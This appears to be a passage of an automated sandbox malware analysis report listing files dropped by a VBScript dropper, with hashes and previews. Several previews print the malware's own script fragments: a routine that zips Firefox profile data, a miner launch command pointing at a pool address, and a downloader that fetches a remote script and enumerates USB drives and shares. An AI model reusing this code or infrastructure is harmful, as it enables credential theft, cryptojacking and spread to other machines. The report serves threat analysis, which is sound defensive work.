	0x0009000000023234-253.exe	Get hash	malicious	AsyncRAT, DcRat, XWorm	Browse	49.12.202.237 172.65.251.78
	0x000600000002323a-338.exe	Get hash	malicious	AsyncRAT, DcRat, XWorm	Browse	49.12.202.237 172.65.251.78

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\WindowsUpdate\WinRing0x64.sys	V8F7xkP66A.exe	Get hash	malicious	Xmrig	Browse
	626.exe	Get hash	malicious	Xmrig	Browse
	3554553.exe	Get hash	malicious	Xmrig	Browse
	6YP2ZccLTi.exe	Get hash	malicious	Xmrig	Browse
	20NmduXqo1.exe	Get hash	malicious	Xmrig	Browse
	lbvgkmtzwmke.exe	Get hash	malicious	Xmrig	Browse
	lkadgje.exe	Get hash	malicious	RedLine, Xmrig	Browse
	x8Rh3L1DiO.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse
	setup-deflated.exe	Get hash	malicious	RHADAMANTHYS, Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	rntNdXd6XX.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Program.Unwanted.5384.5946.6420.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	tesy_-_Copy_(6)_-_Copy.bat	Get hash	malicious	Xmrig	Browse
	tesy_-_Copy_(14).bat	Get hash	malicious	Xmrig	Browse
	jKkDc50MRn.exe	Get hash	malicious	Xmrig	Browse
	SynapseExploit.exe	Get hash	malicious	RedLine, Xmrig	Browse
	https://cdn.unmineable.download/unMiner.2.1.1-beta-mfi.exe	Get hash	malicious	Xmrig	Browse
	4Sx30CYyzf.exe	Get hash	malicious	Xmrig	Browse
	eQ741wtkyC.exe	Get hash	malicious	Amadey, LummaC Stealer, MicroClip, Xmrig	Browse
C:\Users\Public\7g.exe	DocScan-09-28-150.js	Get hash	malicious	IcedID	Browse
C:\Users\Public\7g.exe	curriculum_vitae-copie_(1).vbs	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\Users\Public\7g.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	584704
Entropy (8bit):	6.634685254929279
Encrypted:	false
SSDEEP:	12288:FSjMK6lrdOCdlki5Zc0EyR35ksye/X16PJz5tghj+:FSjieCd+i5s+Jks1foxz5Whj+
MD5:	58FC6DE6C4E5D2FDA63565D54FEB9E75
SHA1:	0586248C327D21EFB8787E8EA9F553DDC03493EC
SHA-256:	72C98287B2E8F85EA7BB87834B6CE1CE7CE7F41A8C97A81B307D4D4BF900922B
SHA-512:	E7373A9CAA023A22CC1F0F4369C2089A939AE40D26999AB5DCAB2C5FEB427DC9F51F96D91EF078E843301BAA5D9335161A2CF015E09E678D56E615D01C8196DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: DocScan-09-28-150.js, Detection: malicious, Browse Filename: curriculum_vitae-copie_(1).vbs, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Aes.............~.......j...............j.......j.........B...............@.....3".......{......3"...............v..............Rich............................PE..L....\.d.................t..........F.............@.......................................@.................................$...x.... .......................0...L......................................................4............................text...Ur.......t.................. ..`.rdata...............x..............@..@.data....j..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...V...0...X..................@..B................................................................................................................................................................................................................................

C:\Users\Public\WindowsUpdate\Update.xml

Download File

Process:	C:\Users\Public\7g.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	2794
Entropy (8bit):	3.549190186621027
Encrypted:	false
SSDEEP:	48:yei1q9tRQSRiMyVwTvara+iaiudupRCRf9ufAuRa7T5XHPsV8i59rQt+++:ttRdRi1WGdiaigV9ll7dHFSQ+
MD5:	21D6C92F3AA287A7BAE667DC3618909E
SHA1:	E09887D505C41E205ADCDFC79A3203BFA9D735B2
SHA-256:	90EA3B7C2B00D4BD10E180777FFDAEA8037DA06208906DBE923AD7207F95C59F
SHA-512:	907E24370DDE2DDECA4007FA563241280571AED2640C367645C859AA375431A88605CA18A775B3B346436C5DB9E9DD53A7D4D8E8E6EAE95DC0605B13BC721171
Malicious:	true
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.1.0.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.3.-.0.2.-.0.5.T.1.4.:.3.1.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.T.i.m.e.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.S.e.t.t.i.n.g.s.>..... . . . .<.M.u.l.t.i.p.l.e.I.n.s.t.a.n.c.e.s.P.o.l.i.c.y.>.I.g.n.o.r.e.N.e.w.<./.M.u.l.t.i.p.l.e.I.n.s.t.a.n.c.e.s.P.o.l.i.c.y.>..... . . . .<.D.

C:\Users\Public\WindowsUpdate\WinRing0x64.sys

Download File

Process:	C:\Users\Public\7g.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 6% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: V8F7xkP66A.exe, Detection: malicious, Browse Filename: 626.exe, Detection: malicious, Browse Filename: 3554553.exe, Detection: malicious, Browse Filename: 6YP2ZccLTi.exe, Detection: malicious, Browse Filename: 20NmduXqo1.exe, Detection: malicious, Browse Filename: lbvgkmtzwmke.exe, Detection: malicious, Browse Filename: lkadgje.exe, Detection: malicious, Browse Filename: x8Rh3L1DiO.exe, Detection: malicious, Browse Filename: setup-deflated.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: rntNdXd6XX.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Program.Unwanted.5384.5946.6420.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: tesy_-_Copy_(6)_-_Copy.bat, Detection: malicious, Browse Filename: tesy_-_Copy_(14).bat, Detection: malicious, Browse Filename: jKkDc50MRn.exe, Detection: malicious, Browse Filename: SynapseExploit.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: 4Sx30CYyzf.exe, Detection: malicious, Browse Filename: eQ741wtkyC.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\WindowsUpdate\go.exe

Download File

Process:	C:\Users\Public\7g.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	226816
Entropy (8bit):	7.8690577923377445
Encrypted:	false
SSDEEP:	6144:S11ynIPsj6sBu8eDJc+SkXe8UmV7Mrra8kyQWmqdJW0bx:SAIPsj6sBCdskXCmVo3kyQLeRbx
MD5:	D418273816199870DE1A16C99702A6CF
SHA1:	92549DDA7BBCAC5EB3CC17C8FF3618C444F82AD3
SHA-256:	5ACF2688DBC6E2078D19AD7580BC06C61BF4DA9C81731738659E2A4A2C045F0B
SHA-512:	34400D0114E9300AAC9C4B0F858376B19FF6F1A00465C424CF3CEF55200204641ABE2F413CE7CA047A49CB981E31EF6C532CA216CB8B28AE362DA251A3E55AFC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 28% Antivirus: Virustotal, Detection: 28%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4..4..4..;...4..;...4......4.7...4..4.5.....4....4....4....4.Rich.4.................PE..L.....Jc.................P...0.......Z.......`....@.............................................................................X....`..."..........................................................................................................UPX0....................................UPX1.....P.......L..................@....rsrc....0...`...&...P..............@..............................................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....

C:\Users\Public\WindowsUpdate\mozilla.vbs

Download File

Process:	C:\Users\Public\7g.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	5.072581191708971
Encrypted:	false
SSDEEP:	96:hGzQkESN/YdJLOwmX+n4dWzqXG5/beHap0HHZY79eI+:hIEc/SLJ5/beH49eI+
MD5:	2A32010561C0E7C6DFD6AB1DA6EA50F5
SHA1:	E10F65729D79E35A22F8701F76BBCC8241099671
SHA-256:	758C47C0FF64310AA0EA98FDEA932D854C46642EBFAD7176A5199FBC23BEEB0B
SHA-512:	922946E92465B424A439FDA30D5B2C8AB6BD2CC8883FBBC328D6CA5BA4E53186F13A2960B58B9A2C881A383F2D4973D25A59CDD3D89EC10D5EEF025713FCDF49
Malicious:	true
Preview:	dim profiles(100)..cpt_profile=0....set objFso = CreateObject("Scripting.FileSystemObject")..Set oShell = CreateObject( "WScript.Shell" )..appdata=oShell.ExpandEnvironmentStrings("%appdata%") ..TraverseFolders appdata....Sub ZipFolder (sFolder,zipFile).. on error resume next.. With CreateObject("Scripting.FileSystemObject").. zipFile = .GetAbsolutePathName(zipFile).. sFolder = .GetAbsolutePathName(sFolder).... With .CreateTextFile(zipFile, True).. .Write Chr(80) & Chr(75) & Chr(5) & Chr(6) & String(18, chr(0)).. End With.. End With.... With CreateObject("Shell.Application").. .NameSpace(zipFile).CopyHere .NameSpace(sFolder).Items.. Do Until .NameSpace(zipFile).Items.Count = _.. .NameSpace(sFolder).Items.Count.. WScript.Sleep 1000 .. Loop.. End With....End Sub....Function TraverseFolders(f)..set fldr = objFso.GetFolder(f)..if objFso.fileexists(f+"\cookies.sqlite") and objFso.fileexists(

C:\Users\Public\WindowsUpdate\mservice.exe

Download File

Process:	C:\Users\Public\7g.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4770304
Entropy (8bit):	6.649403136807024
Encrypted:	false
SSDEEP:	98304:4XCVqZY5SVIhbh1A8K/drFfV6I8NXpBtkuzDS8VvazdNBi/:VVqJkI89pBTDS8NeNi/
MD5:	CFC0000B993A31C11EF58AC53837E4E1
SHA1:	750752B9C20C6BAC25C172FC5A0645CC7D631457
SHA-256:	47D70838CBEDC8B0E0634E51BDE8A72035922BDDC1177CC9210FA0ADB967D6A2
SHA-512:	BF03704F5E363940328112825976B78BE50E4A8BE2A64D50EB71E1EC016946F9D6DD256ECD2B87105AE45614982351B27AE99A53284321C3EBBC16CE316B960E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Joe Security Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 56% Antivirus: Virustotal, Detection: 73%, Browse
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........=...\...\...\...7...\...7...\...3{..\...)...\...)...\...)...\...7...\...)...\...7...\...\...]...)...^...)...\...)...\...)y..\...\...\...)...\..Rich.\..........................PE..d....dc..........".......4...>.......0........@............................. s......jI...`.................................................\|tE.......r......@p.<.............r.h{..@.B.......................B.(...`.B.8............ 4..............................text.....4.......4................. ..`.rdata...u... 4..v....4.............@..@.data...4.*...E.......E.............@....pdata..<....@p......"F.............@..@_RANDOMXV.... r.......G.............@..`_TEXT_CN.&...0r..(....H.............@..`_TEXT_CN.....`r......4H.............@..`_RDATA........r......FH.............@..@.rsrc.........r......HH.............@..@.reloc..h{....r..\|...NH.............@..B................................

C:\Users\Public\WindowsUpdate\mservice.vbs

Download File

Process:	C:\Users\Public\7g.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1567
Entropy (8bit):	5.512753159656669
Encrypted:	false
SSDEEP:	24:bCqIXN2pAMTEgPFtM41PKk+EfYg+1TK/AFhHqITUzF+Z+5H0iwWq/AnhskYn9DW0:HQgPFtMLkfQVNE2KIqF+I5HNkgzYl
MD5:	E8411D093BCE7B68E855B25A67D86B12
SHA1:	FB68D7D7229DCCE49EB56E02DA53871CBCADDF12
SHA-256:	520C13462DD5A5EC8F06C9133132F49CB5BAB4065623DDEE96F98AE8815E025F
SHA-512:	A9F0FA1D7F552E3444141ACE36F0B831ECB0CF69A20C0083AE03A105771882BF4C0B1EA17BB3DC4EBD919992AE646F05D7137F82C2BF570A28ADE95BE7A54258
Malicious:	true
Preview:	Function LPad (str, pad, length).. LPad = String(length - Len(str), pad) & str..End Function....set L5ofL5 = CreateObject("Scripting.FileSystemObject")..if not L5ofL5.FileExists("c:\users\public\log.dat") then ..set f = L5ofL5.CreateTextFile("c:\users\public\log.dat",True)..f.Write LPad(day(now), "0", 2)+LPad(month(now), "0", 2)+"-"+LPad(hour(now), "0", 2)+"h"+LPad(minute(now), "0", 2)+"m"..f.close..end if..set f2 = L5ofL5.OpenTextFile("c:\users\public\log.dat")..d = f2.ReadLine..f2.Close....Dim objWMIService, objComputer, colComputer ..Set objWMIService = GetObject("winmgmts:"& "{impersonationLevel=impersonate}!\\.\root\cimv2") ..Set colComputer = objWMIService.ExecQuery("Select * from Win32_ComputerSystem") ..For Each objComputer in colComputer ..ram = objComputer.TotalPhysicalMemory/(1024*1024)..Next ..if ram > 4096 then ..mode="auto"..Else..mode="light"..end if....command0 = """%public%\windowsupdate\mservice.exe"" -o 141.94.96.144:443 -u 46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeB

C:\Users\Public\WindowsUpdate\ps.exe

Download File

Process:	C:\Users\Public\7g.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402944
Entropy (8bit):	6.666814366272581
Encrypted:	false
SSDEEP:	6144:QNV8uoDRSdm3v93UFlssFHgkU9KvKUXr/BAO9N/oXrsAteTQokizYu:eSDRSm3vrugB9KvKk9RO8k3u
MD5:	2024EA60DA870A221DB260482117258B
SHA1:	716554DC580A82CC17A1035ADD302C0766590964
SHA-256:	53043BD27F47DBBE3E5AC691D8A586AB56A33F734356BE9B8E49C7E975241A56
SHA-512:	FFCD4436B80169BA18DB5B7C818C5DA71661798963C0A5F5FBAC99A6974A7729D38871E52BC36C766824DD54F2C8FA5711415EC45799DB65C11293D8B829693B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\Public\WindowsUpdate\ps.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 81% Antivirus: Virustotal, Detection: 76%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................9.......9............... ......................;.......;.......;......Rich............PE..L....hy`.....................P......,i............@..................................................................................@..................................................................................p............................text............................... ..`.rdata..............................@..@.data..............................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\WindowsUpdate\sarmat.vbs

Download File

Process:	C:\Users\Public\7g.exe
File Type:	assembler source, ASCII text
Category:	dropped
Size (bytes):	2559
Entropy (8bit):	5.054358680199897
Encrypted:	false
SSDEEP:	48:PbR2Hk8fSRgDmgTzlREzXacPeIpLVdxpDnBmKhRhFI/nwvvZiOrA7BehBqnHOW+x:PbR2HtfUoxflREzXacGYzxBWCRpXMunx
MD5:	08AD7921EC11078118F3AEB89E177C3F
SHA1:	633197EE0570BA80CFE2358BBC483B64D84E838B
SHA-256:	E66DA8042513B237CE1BE98A5291C61ADE2A8EBDB87B6AEB4EB9E200B38AFC53
SHA-512:	009FE96D10FBCD751C41B7738D7E7C2748DF0F0F4C6A206C973E19D93116DE5D4906568236EC904B74302D12467126B383F3980E3351DCCD6F0232B211ABD061
Malicious:	false
Preview:	.sub L5dwlL5(L5uL5, L5sL5).dim L5xL5: Set L5xL5 = createobject("Microsoft.XMLHTTP").dim L5bL5: Set L5bL5 = createobject("Adodb.Stream").L5xL5.Open "GET", L5uL5, False.L5xL5.Send..with L5bL5. .type = 1 '//binary. .open. .write L5xL5.responseBody. .savetofile L5sL5, 2 '//overwrite.end with.end sub..url = "https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false"...on error resume next..sub listDrives.dim drives(100).dim labels(100).i=0.Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")..Set colDisks = objWMIService.ExecQuery ("Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4").For Each objDisk in colDisks. letter = objDisk.DeviceID..if fso.GetDrive(letter).isReady then...drives(i)=letter. labels(i)=fso.GetDrive(letter).volumename...i=i+1..end if.Next.Set colShares = objWMIService.ExecQuery("Select * from Win32_Share where not name like '%$%'")..For each objShare in colShares.sharedfolder

C:\Users\Public\gmail.7z

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	1960640
Entropy (8bit):	7.999904660999247
Encrypted:	true
SSDEEP:	49152:aUXIV4OGLOd2YHtcmQL/IEP2g3Pg/1oVkZkF:aUXI9H+7VVrkeF
MD5:	DB3D91CF23248F2012B94A639A700B40
SHA1:	FFCF9AE2A5387506A38A97B7AE70B4F3E70A6A80
SHA-256:	AE9E267EE77B7DFFEB7D1BAA2091B537BBB0BA3F4DCC877A7C6144D62311FC76
SHA-512:	AF0C4A7982AD70A2FF3481A8750F278B357FF21D1E6269F944296BF8F26567135F00F1CDC57CFAA4B5C0D613045021639D9DA20E553C6E6B9F862BC14D47E128
Malicious:	true
Preview:	7z..'.....ue`.......@......../y../..\#.\|.o.<.j...M..K.y..&..x.x......\|V.....6D...m@W[.......~n.....S..Ht!.m\|c...3.q.c........^..Q....wg6..;q.vo.h.W../ .T.(.v...).G....N....^.P.q...EP.Z'`72f..J...$....w.......=.,...I.>6l..$_.......4.U.dO.p.83=...d.M..B9..%r.l.g8.m.-..r....i....9....q...D...vn..p.,.4L.I.U.......\|..l._.W.\58.C......8K-..... .........5.@...r5b....L.....Fxv\|..M..^....R.K..P.>.=$U..t...5...@..\|.......a.\|8..i!._....'..E._,.#...B..]....S....zO...p......\|]......i.S/..dphV.....~.j.7.....S...iL..:L.r2...M;.\.s....nT.4.....K<.0.H!M.FR..z.E&@..b..m....J.....n.....R.cy%.I...W32sew...T.t.R..f..Z.....+.Z..N\|!....in%.S.yZ.''..{6.w.....`jt..lD^t.......\.?.......{.Q$...N.....8......Q`^..J8.3$Y.._/...p..Gv h.~."..NP]......NQ.Pq3.H6-s".KU.K...I.A..w..3.D..`....G.V......b....>yE.:`9...fV.e.^.=....6f..ee.kyl....,....Th....O..e......x.g.1{........."...I.y.....3g..\|..e....L...:0S...j....-{fy..w..w`w}-..K.+..G.e."..5...u^naH.6/.^.../..t.....M..

C:\Users\Public\log.dat

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	2.845350936622437
Encrypted:	false
SSDEEP:	3:Rn:R
MD5:	5B8043602C4C9C834B5D36D5A7C5A01E
SHA1:	7DC0C9C3E2BA19244464AA5FAEC344F14716C0FF
SHA-256:	CA1BDDDB8CC7C55153C60B433581317AA46F9A823CADA3BCB017983A2A129664
SHA-512:	FF7C5B1BE82F7863D842D9E12B542D789FE1A0696B9972FCB55C3D9A55080DDA4643325B7EE8286282FCCDC86AC44A44E08A685165742A945C965D76CB063C9F
Malicious:	false
Preview:	0401-08h49m

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\7zr[1].exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	584704
Entropy (8bit):	6.634685254929279
Encrypted:	false
SSDEEP:	12288:FSjMK6lrdOCdlki5Zc0EyR35ksye/X16PJz5tghj+:FSjieCd+i5s+Jks1foxz5Whj+
MD5:	58FC6DE6C4E5D2FDA63565D54FEB9E75
SHA1:	0586248C327D21EFB8787E8EA9F553DDC03493EC
SHA-256:	72C98287B2E8F85EA7BB87834B6CE1CE7CE7F41A8C97A81B307D4D4BF900922B
SHA-512:	E7373A9CAA023A22CC1F0F4369C2089A939AE40D26999AB5DCAB2C5FEB427DC9F51F96D91EF078E843301BAA5D9335161A2CF015E09E678D56E615D01C8196DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Aes.............~.......j...............j.......j.........B...............@.....3".......{......3"...............v..............Rich............................PE..L....\.d.................t..........F.............@.......................................@.................................$...x.... .......................0...L......................................................4............................text...Ur.......t.................. ..`.rdata...............x..............@..@.data....j..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...V...0...X..................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\gmail[1].7z

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	1960640
Entropy (8bit):	7.999904660999247
Encrypted:	true
SSDEEP:	49152:aUXIV4OGLOd2YHtcmQL/IEP2g3Pg/1oVkZkF:aUXI9H+7VVrkeF
MD5:	DB3D91CF23248F2012B94A639A700B40
SHA1:	FFCF9AE2A5387506A38A97B7AE70B4F3E70A6A80
SHA-256:	AE9E267EE77B7DFFEB7D1BAA2091B537BBB0BA3F4DCC877A7C6144D62311FC76
SHA-512:	AF0C4A7982AD70A2FF3481A8750F278B357FF21D1E6269F944296BF8F26567135F00F1CDC57CFAA4B5C0D613045021639D9DA20E553C6E6B9F862BC14D47E128
Malicious:	false
Preview:	7z..'.....ue`.......@......../y../..\#.\|.o.<.j...M..K.y..&..x.x......\|V.....6D...m@W[.......~n.....S..Ht!.m\|c...3.q.c........^..Q....wg6..;q.vo.h.W../ .T.(.v...).G....N....^.P.q...EP.Z'`72f..J...$....w.......=.,...I.>6l..$_.......4.U.dO.p.83=...d.M..B9..%r.l.g8.m.-..r....i....9....q...D...vn..p.,.4L.I.U.......\|..l._.W.\58.C......8K-..... .........5.@...r5b....L.....Fxv\|..M..^....R.K..P.>.=$U..t...5...@..\|.......a.\|8..i!._....'..E._,.#...B..]....S....zO...p......\|]......i.S/..dphV.....~.j.7.....S...iL..:L.r2...M;.\.s....nT.4.....K<.0.H!M.FR..z.E&@..b..m....J.....n.....R.cy%.I...W32sew...T.t.R..f..Z.....+.Z..N\|!....in%.S.yZ.''..{6.w.....`jt..lD^t.......\.?.......{.Q$...N.....8......Q`^..J8.3$Y.._/...p..Gv h.~."..NP]......NQ.Pq3.H6-s".KU.K...I.A..w..3.D..`....G.V......b....>yE.:`9...fV.e.^.=....6f..ee.kyl....,....Th....O..e......x.g.1{........."...I.y.....3g..\|..e....L...:0S...j....-{fy..w..w`w}-..K.+..G.e."..5...u^naH.6/.^.../..t.....M..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulJnp/p:NllU
MD5:	BC6DB77EB243BF62DC31267706650173
SHA1:	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512:	91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious:	false
Preview:	@...e.................................X..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nukgcap2.1q2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ocm3mv2k.nmn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4nhvbp4.pfm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxmywejx.f0v.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

\Device\ConDrv

Download File

Process:	C:\Users\Public\7g.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	519
Entropy (8bit):	5.036120553279978
Encrypted:	false
